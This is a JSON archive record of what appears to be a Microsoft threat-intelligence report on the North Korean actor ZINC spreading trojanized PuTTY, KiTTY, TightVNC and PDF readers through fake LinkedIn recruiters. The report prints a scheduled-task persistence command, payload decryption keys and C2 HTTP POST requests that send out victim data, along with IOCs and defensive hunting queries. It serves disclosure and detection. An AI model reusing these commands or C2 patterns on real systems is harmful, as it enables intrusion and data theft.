{
	"id": "511fbce0-4446-45c8-8f34-42a35e3fbe80",
	"created_at": "2026-04-06T03:35:54.418487Z",
	"updated_at": "2026-04-10T03:38:20.52768Z",
	"deleted_at": null,
	"sha1_hash": "3ab4a20e607e8da70219a5abcea462c5d8517e20",
	"title": "ZINC weaponizing open-source software",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 782396,
	"plain_text": "ZINC weaponizing open-source software\r\nBy Microsoft Threat Intelligence, LinkedIn Threat Prevention and Defense\r\nPublished: 2022-09-29 · Archived: 2026-04-06 02:53:07 UTC\r\nApril 2023 update – Microsoft Threat Intelligence has shifted to a new threat actor naming taxonomy aligned around the\r\ntheme of weather. ZINC is now tracked as Diamond Sleet.\r\nTo learn about how the new taxonomy represents the origin, unique traits, and impact of threat actors, and to get a complete\r\nmapping of threat actor names, read this blog: Microsoft shifts to a new threat actor naming taxonomy.\r\nIn recent months, Microsoft has detected a wide range of social engineering campaigns using weaponized legitimate open-source software by an actor we track as ZINC. Microsoft Threat Intelligence Center (MSTIC) observed activity targeting\r\nemployees in organizations across multiple industries including media, defense and aerospace, and IT services in the US,\r\nUK, India, and Russia. Based on the observed tradecraft, infrastructure, tooling, and account affiliations, MSTIC attributes\r\nthis campaign with high confidence to ZINC, a state-sponsored group based out of North Korea with objectives focused on\r\nespionage, data theft, financial gain, and network destruction.\r\nBeginning in June 2022, ZINC employed traditional social engineering tactics by initially connecting with individuals on\r\nLinkedIn to establish a level of trust with their targets. Upon successful connection, ZINC encouraged continued\r\ncommunication over WhatsApp, which acted as the means of delivery for their malicious payloads.\r\nMSTIC observed ZINC weaponizing a wide range of open-source software including PuTTY, KiTTY, TightVNC, Sumatra\r\nPDF Reader, and muPDF/Subliminal Recording software installer for these attacks. ZINC was observed attempting to move\r\nlaterally and exfiltrate collected information from victim networks. 
The actors have successfully compromised numerous\r\norganizations since June 2022. The ongoing campaign related to the weaponized PuTTY was also reported by Mandiant\r\nearlier this month. Due to the wide use of the platforms and software that ZINC utilizes in this campaign, ZINC could pose a\r\nsignificant threat to individuals and organizations across multiple sectors and regions.\r\nMicrosoft Defender for Endpoint provides comprehensive protection against tools and custom malware used by ZINC,\r\nincluding ZetaNile. The hunting queries provided at the end of this blog will help customers comprehensively search their\r\nenvironments for relevant indicators. As with any observed nation-state actor activity, Microsoft directly notifies customers\r\nthat have been targeted or compromised, providing them with the information they need to secure their accounts. \r\nWho is ZINC? \r\nZINC is a highly operational, destructive, and sophisticated nation-state activity group. Active since 2009, the activity group\r\ngained further public notoriety in 2014 following their successful attack against Sony Pictures Entertainment. ZINC is\r\nknown to use a variety of custom remote access tools (RATs) as part of their arsenal, including those detected by Microsoft\r\nas FoggyBrass and PhantomStar.  \r\nMicrosoft researchers have observed spear-phishing as a primary tactic of ZINC actors, but they have also been observed\r\nusing strategic website compromises and social engineering across social media to achieve their objectives. ZINC targets\r\nemployees of companies it’s attempting to infiltrate and seeks to coerce these individuals into installing seemingly benign\r\nprograms or opening weaponized documents that contain malicious macros. 
Targeted attacks have also been carried out\r\nagainst security researchers over Twitter and LinkedIn.\r\nZINC attacks appear to be motivated by traditional cyberespionage, theft of personal and corporate data, financial gain, and\r\ncorporate network destruction. ZINC attacks bear many hallmarks of state-sponsored activities, such as heightened\r\noperational security, sophisticated malware that evolves over time, and politically motivated targeting.\r\nZINC, tracked by other security companies as Labyrinth Chollima and Black Artemis, has been observed conducting this\r\ncampaign from late April to mid-September 2022.\r\nhttps://www.microsoft.com/en-us/security/blog/2022/09/29/zinc-weaponizing-open-source-software/\r\nPage 1 of 8\n\nFigure 1. Attack flow diagram for recent ZINC campaign\r\nObserved actor activity\r\nImpersonation and establishing contact\r\nLinkedIn Threat Prevention and Defense detected ZINC creating fake profiles claiming to be recruiters working at\r\ntechnology, defense, and media entertainment companies, with the goal of moving targets away from LinkedIn and to the\r\nencrypted messaging app WhatsApp for the delivery of malware. ZINC primarily targeted engineers and technical support\r\nprofessionals working at media and information technology companies located in the UK, India, and the US. Targets\r\nreceived outreach tailored to their profession or background and were encouraged to apply for an open position at one of\r\nseveral legitimate companies. In accordance with their policies, for accounts identified in these attacks, LinkedIn quickly\r\nterminated any accounts associated with inauthentic or fraudulent behavior.\r\nFigure 2. Fraudulent recruiter profile\r\nMultiple methods used for delivery of ZetaNile\r\nMSTIC has observed at least five methods of trojanized open-source applications containing the malicious payload and\r\nshellcode that is tracked as the ZetaNile malware family. 
The ZetaNile implants, also known as BLINDINGCAN, have been\r\ncovered in CISA and JPCERT reports. The implant DLLs in the ZetaNile malware family are either packed with commercial\r\nsoftware protectors such as Themida and VMProtect or are encrypted using custom algorithms. The payload in the malicious\r\nDLL is decrypted using a custom key, passed as part of the DLL search order hijacking of the legitimate Windows process,\r\nas shown in Figure 3. The ZetaNile implants use unique custom encryption methods or AES encryption to generate\r\ncommand and control (C2) HTTP requests to known compromised C2 domains. By encoding the victim information in the\r\nparameters for common keywords like gametype or bbs in the HTTP POSTs, these C2 communications can blend in with\r\nlegitimate traffic.\r\nWeaponization of SSH clients\r\nOnce they have established a connection with their target, ZINC operationalized malicious versions of two SSH clients,\r\nPuTTY and KiTTY, that acted as the entry vector for the ZetaNile implant. Both utilities provide terminal emulator support\r\nfor different networking protocols, making them attractive programs for individuals commonly targeted by ZINC. The\r\nweaponized versions were often delivered as compressed ZIP archives or ISO files. Within that archive, the recipient is\r\nprovided a ReadMe.txt and an executable file to run. As part of the evolution of ZINC’s malware development, and in an\r\neffort to evade traditional defenses, running the included executable does not drop the ZetaNile implant. For ZetaNile to be\r\ndeployed, the SSH utility requires the IP provided in the ReadMe.txt file. 
An example of the content of that file is provided\r\nbelow:\r\nServer: 137[.]184[.]15[.]189\r\nUser: [redacted]\r\nPass: [redacted]\r\nWeaponized PuTTY malware\r\nZINC has been using trojanized PuTTY as part of its attack chain for many years, and this most recent variant establishes\r\npersistence on compromised devices by utilizing scheduled tasks. This activity was recently reported by Mandiant. The\r\nmalicious PUTTY.exe is configured to install the Event Horizon malware in C:\\ProgramData\\colorui.dll and subsequently\r\ncopy C:\\Windows\\System32\\colorcpl.exe to C:\\ProgramData\\colorcpl.exe. By using DLL search order hijacking, ZINC can\r\nload the second stage malware, colorui.dll, and decode the payload with the key\r\n“0CE1241A44557AA438F27BC6D4ACA246” to be used for command and control. Upon successful connection to the C2\r\nserver, the attackers can install additional malware on the compromised device for other tasks.\r\nLastly, persistence is established with the creation of a daily scheduled task, PackageColor, as part of the configuration for\r\nthe weaponized PuTTY. ZINC accomplishes this with the following command:\r\nFigure 3. PuTTY – scheduled task as part of persistence\r\nWeaponized KiTTY malware\r\nWhile ZINC has utilized weaponized PuTTY for many years, ZINC has only recently expanded their capabilities to include\r\nweaponizing a fork of PuTTY called KiTTY. The executable first collects the username and hostname of the victim system.\r\nIt then sends that information to a hardcoded IP 172[.]93[.]201[.]253 over TCP/22, which does not use the SSH protocol and\r\ndoes not require an SSH handshake to establish communication. Upon successful TCP connection to the server at\r\n137[.]184[.]15[.]189, the malicious KiTTY executable then deploys the malware as %AppData%\\mscoree.dll following\r\nmultiple rounds of decoding. The mscoree.dll file is the embedded payload, detected as EventHorizon, in the ZetaNile\r\nmalware family. 
Similar to ZINC’s version of PuTTY, the actor uses DLL search order hijacking to load malicious DLL files\r\nthat perform tasks within the context of these legitimate Windows processes, specifically through\r\n%AppData%KiTTY%PresentationHost.exe -EmbeddingObject.\r\nFigure 4. KiTTY – DLL search order hijacking\r\nThe mscoree.dll malware is modularized in such a way that, upon successful connection to the compromised C2 domain, the\r\nattackers can install additional malware on the target system as needed using the existing C2 communication, such as\r\nexecuting C:\\ProgramData\\Cisco\\fixmapi.exe -s AudioEndpointBuilder to load malicious mapistub.dll from the\r\ncompromised C2 server. The HTTP POST requests contain the hardcoded user agent string with misspelled “Edge”, as\r\ndetailed below, and contain a unique ID for the field gametype and the hardcoded value for the field type for malware\r\ncampaign tracking purposes:\r\nPOST /wp-includes/php-compat/compat.php HTTP/1.1\r\nAccept: text/*\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/102.0.5005.63 Safari/537.36 Edg/100.0.1185.39\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 39\r\nHost: olidhealth[.]com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache \r\ngametype=[UniqueId]\u0026type=O8Akm8aV09Nw412KoWJds \r\nWeaponized TightVNC Viewer\r\nBeginning in September 2022, ZINC was observed utilizing a trojanized TightVNC Viewer that was delivered to a target\r\nalongside a weaponized SSH utility over WhatsApp. 
This malware has a unique PDBPath:\r\nN:\\2.MyDevelopment\\3.Tools_Development\\4.TightVNCCustomize\\Munna_Customize\\tightvnc\\x64\\\\Release\\tvnviewer.pdb\r\nThe weaponized versions of TightVNC Viewer often were delivered as compressed ZIP archives or job description-themed\r\nISO files via online platforms such as WhatsApp. Within that archive, the recipient is provided a ReadMe.txt and an\r\nexecutable file to run. The .txt file has the following content:\r\nPlatform: 2nd from the list\r\nUser: [redacted]\r\nPass: [redacted]\r\nAs part of the threat actor’s latest malware technique to evade traditional defenses, the malicious TightVNC Viewer has a\r\npre-populated list of remote hosts, and it’s configured to install the backdoor only when the user selects ec2-aet-tech.w-ada[.]amazonaws from the drop-down menu in the TightVNC Viewer, as shown in Figure 5:\r\nFigure 5. Weaponized TightVNC Viewer – user interface\r\nThe malware was configured to send the username and hostname to IP 44[.]238[.]74[.]84 on TCP/22 as part of the victim\r\ncheck-in with the C2 and establish VNC connections to the same IP on port TCP/5900. Once a successful connection is\r\nestablished to the server IP, the embedded second stage DLL payload from TightVNC.exe is loaded in memory to establish\r\nC2 communication to a known compromised domain.\r\nWeaponization of Sumatra PDF reader and muPDF/Subliminal Recording installer\r\nZINC has operationalized malicious versions of two PDF readers, Sumatra PDF and muPDF/Subliminal Recording installer,\r\nthat act as the entry vector for the ZetaNile implant. This delivery mechanism is often utilized in relation to fraudulent job\r\npostings delivered to job-seeking targets in the IT and defense sector. The weaponized versions were often delivered as\r\ncompressed ZIP archives. Within that archive, the recipient is provided with an executable file to run. 
While the malicious\r\nSumatra PDF reader is a fully functional PDF reader that can load the malicious implant from a fake PDF, the\r\nmuPDF/Subliminal Recording installer can set up the backdoor without loading any malicious PDF files.\r\nTrojanized Sumatra PDF Reader\r\nThe trojanized version of Sumatra PDF Reader named SecurePDF.exe has been utilized by ZINC since at least 2019 and\r\nremains a unique ZINC tradecraft. SecurePDF.exe is a modularized loader that can install the ZetaNile implant by loading a\r\nweaponized job application themed file with a .PDF extension. The fake PDF contains a header “SPV005”, a decryption\r\nkey, encrypted second stage implant payload, and encrypted decoy PDF, which is rendered in the Sumatra PDF Reader when\r\nthe file is opened.\r\nOnce loaded in memory, the second stage malware is configured to send the victim’s system hostname and device\r\ninformation using custom encoding algorithms to a C2 communication server as part of the C2 check-in process. The\r\nattackers can install additional malware onto the compromised devices using the C2 communication as needed.\r\nFigure 6. SecurePDF interface\r\nTrojanized muPDF/Subliminal Recording installer\r\nWithin the trojanized version of muPDF/Subliminal Recording installer, setup.exe is configured to check if the file path\r\nISSetupPrerequisites\\Setup64.exe exists and write C:\\colrctl\\colorui.dll on disk after extracting the embedded executable\r\ninside setup.exe. It then copies C:\\Windows\\System32\\ColorCpl.exe to C:\\ColorCtrl\\ColorCpl.exe. For the second stage\r\nmalware, the malicious installer creates a new process C:\\colorctrl\\colorcpl.exe C3A9B30B6A313F289297C9A36730DB6D,\r\nand the argument C3A9B30B6A313F289297C9A36730DB6D gets passed on to colorui.dll as a decryption key. 
The DLL\r\ncolorui.dll, which Microsoft is tracking as the EventHorizon malware family, is injected into\r\nC:\\Windows\\System\\credwiz.exe or iexpress.exe to send C2 HTTP requests as part of the victim check-in process and to get\r\nan additional payload.\r\nPOST /support/support.asp HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;\r\nTrident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729;\r\nInfoPath.3; .NET4.0C; .NET4.0E)\r\nContent-Length: 125\r\nHost: www.elite4print[.]com \r\nbbs=[encrypted payload]= \u0026article=[encrypted payload]\r\n \r\nMicrosoft will continue to monitor ZINC activity and implement protections for our customers. The current detections and\r\nIOCs in place across our security products are detailed below.\r\nRecommended customer actions\r\nThe techniques used by the actor and described in the “Observed actor activity” section can be mitigated by adopting the\r\nsecurity considerations provided below:\r\nUse the included indicators of compromise to investigate whether they exist in your environment and assess for\r\npotential intrusion.\r\nBlock in-bound traffic from IPs specified in the “Indicators of compromise” table.\r\nReview all authentication activity for remote access infrastructure, with a particular focus on accounts configured\r\nwith single factor authentication, to confirm authenticity and investigate any anomalous activity.\r\nEnable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is\r\nenforced for all remote connectivity.  
NOTE: Microsoft strongly encourages all customers to download and use\r\npassword-less solutions like Microsoft Authenticator to secure your accounts.\r\nEducate end users about preventing malware infections, including by ignoring or deleting unsolicited and unexpected\r\nemails with ISO attachments. Encourage end users to practice good credential hygiene—limit the use of accounts\r\nwith local or domain admin privileges and turn on Microsoft Defender Firewall to prevent malware infection and\r\nstifle propagation.\r\nEducate end users about protecting personal and business information in social media, filtering unsolicited\r\ncommunication, identifying lures in spear-phishing email and watering holes, and reporting of reconnaissance\r\nattempts and other suspicious activity.\r\nIndicators of compromise (IOCs)\r\nThe below list provides IOCs observed during our investigation. We encourage our customers to investigate these indicators\r\nin their environments and implement detections and protections to identify past related activity and prevent future attacks\r\nagainst their systems.\r\nIndicator Type\r\nAmazon-KiTTY.exe File name\r\nAmazon_IT_Assessment.iso File name\r\nIT_Assessment.iso File name\r\namazon_assessment_test.iso File name\r\nSecurePDF.exe File name\r\nC:\\ProgramData\\Comms\\colorui.dll File path\r\n%APPDATA%\\KiTTY\\mscoree.dll File path\r\n172.93.201[.]253 IP address\r\n137.184.15[.]189 IP address\r\n44.238.74[.]84 IP address\r\nc:\\windows\\system32\\schtasks.exe /CREATE /SC DAILY /MO 1 /ST 10:30 /TR “C:\\Windows\\System32\\cmd.exe /c start /b\r\nC:\\ProgramData\\PackageColor\\colorcpl.exe 0CE1241A44557AA438F27BC6D4ACA246” /TN PackageColor /F\r\nScheduled task name\r\n1492fa04475b89484b5b0a02e6ba3e52544c264c294b57210404b96b65e63266 SHA-256\r\naaad412aeb0f98c2c27bb817682f08673902a48b65213091534f96fe6f5494d9 
SHA-256\r\n63cddab76e9d63e3cbea421b607342735d924e462c40f3917b1b5fbdf8d4a20d SHA-256\r\ne1ecf0f7bd90553baaa83dcdc177e1d2b20d6ee5520f5d9b44cdf59389432b10 SHA-256\r\nc5a470cdf6f57125a8671f6b8843149cc78ccbc1a7bc615f34b23d9f241312bf SHA-256\r\n71beb4252e93291c7b14dfcb4cbb5d58144a76181fbe4aab3592121a3dbd9c55 SHA-256\r\nolidhealth[.]com/wp-includes/php-compat/compat.php Compromised domain\r\nhurricanepub[.]com/include/include.php Compromised domain\r\nturnscor[.]com/wp-includes/contacts.php Compromised domain\r\nelite4print[.]com/support/support.asp Compromised domain\r\ncats.runtimerec[.]com/db/dbconn.php Compromised domain\r\nrecruitment.raystechserv[.]com/lib/artichow/BarPlotDashboard.object.php Compromised domain\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63\r\nSafari/537.36 Edg/100.0.1185.39 User agent\r\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR\r\n3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E) User agent\r\nN:\\2.MyDevelopment\\3.Tools_Development\\4.TightVNCCustomize\\Munna_Customize\\tightvnc\\x64\\\\Release\\tvnviewer.pdb PDBPath\r\n37e30dc2faaabaf93f0539ffbde032461ab63a2c242fbe6e1f60a22344c8a334 SHA-256\r\n14f736b7df6a35c29eaed82a47fc0a248684960aa8f2222b5ab8cdad28ead745 SHA-256\r\nNOTE: These indicators should not be considered exhaustive for this observed activity.\r\nDetections\r\nMicrosoft Defender Antivirus\r\nMicrosoft Defender Antivirus and Microsoft Defender for Endpoint customers should look for the following family names\r\nfor activity related to these attacks:\r\nZetaNile\r\nEventHorizon\r\nFoggyBrass\r\nPhantomStar\r\nMicrosoft Defender for Endpoint\r\nThe following Microsoft Defender for Endpoint alerts could indicate activity associated 
with this threat. These alerts,\r\nhowever, can be triggered by unrelated threat activity.\r\nSuspicious Task Scheduler activity\r\nSuspicious connection to remote service\r\nA suspicious file was observed\r\nAn executable loaded an unexpected dll\r\nPossible theft of remote session credentials\r\nAdvanced hunting queries\r\nMicrosoft Sentinel\r\nMicrosoft Sentinel customers can use the following queries to look for the related malicious indicators in their\r\nenvironments.\r\nIdentify ZINC IP/domain/hash IOC\r\nThis query identifies a match across various data feeds for IP/Domain IOCs related to the Zinc actor as shared in this blog\r\npost.\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Zinc Open Source/Analytic\r\nRules/ZincOctober2022_IP_Domain_Hash_IOC.yaml\r\nIdentify ZINC filename/command line IOC\r\nTo locate possible Zinc Filename/command line activity shared in the blog Microsoft Sentinel customers can use the queries\r\nbelow:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Zinc Open Source/Analytic\r\nRules/ZincOctober2022_Filename_Commandline_IOC.yaml\r\nIdentify ZINC AV hits IOC\r\nThis query looks for Microsoft Defender AV detections related to Zinc actor as shared in the blog post:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Zinc Open Source/Analytic\r\nRules/ZincOctober2022_AVHits_IOC.yaml\r\nMicrosoft 365 Defender\r\nTo locate related activity, Microsoft 365 Defender customers can run the following advanced hunting queries:\r\nSuspicious mapistub.dll file creation\r\nLook for PresentationHost.exe creating mapistub.dll, likely for use in DLL search order hijacking attacks.\r\nDeviceFileEvents\r\n| where InitiatingProcessFileName =~ \"presentationhost.exe\"\r\n| where FileName =~ \"mapistub.dll\"\r\nSuspicious mscoree.dll file 
creation\r\nLook for instances of mscoree.dll created by PuTTY processes. \r\nDeviceFileEvents\r\n| where InitiatingProcessFileName hassuffix \"kitty.exe\" or InitiatingProcessVersionInfoInternalFileName has\r\n\"PuTTY\"\r\n| where FileName =~ \"mscoree.dll\"\r\nSuspicious colorcpl.exe image load\r\nSurface instances of the colorcpl.exe process loading colorui.dll not in an expected path, indicative of a DLL search order\r\nhijacking attack. \r\nDeviceImageLoadEvents\r\n| where InitiatingProcessFileName =~ \"colorcpl.exe\"\r\n| where FileName =~ \"colorui.dll\" and not(FolderPath has_any(\"system32\", \"syswow64\", \"program files\"))\r\nSource: https://www.microsoft.com/en-us/security/blog/2022/09/29/zinc-weaponizing-open-source-software/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.microsoft.com/en-us/security/blog/2022/09/29/zinc-weaponizing-open-source-software/"
	],
	"report_names": [
		"zinc-weaponizing-open-source-software"
	],
	"threat_actors": [
		{
			"id": "998746e1-b4b8-429b-a737-6eb368247c42",
			"created_at": "2022-10-25T16:07:23.505704Z",
			"updated_at": "2026-04-10T02:00:04.632806Z",
			"deleted_at": null,
			"main_name": "Covellite",
			"aliases": [
				"Black Artemis",
				"CTG-2460",
				"Nickel Academy"
			],
			"source_name": "ETDA:Covellite",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775446554,
	"ts_updated_at": 1775792300,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3ab4a20e607e8da70219a5abcea462c5d8517e20.pdf",
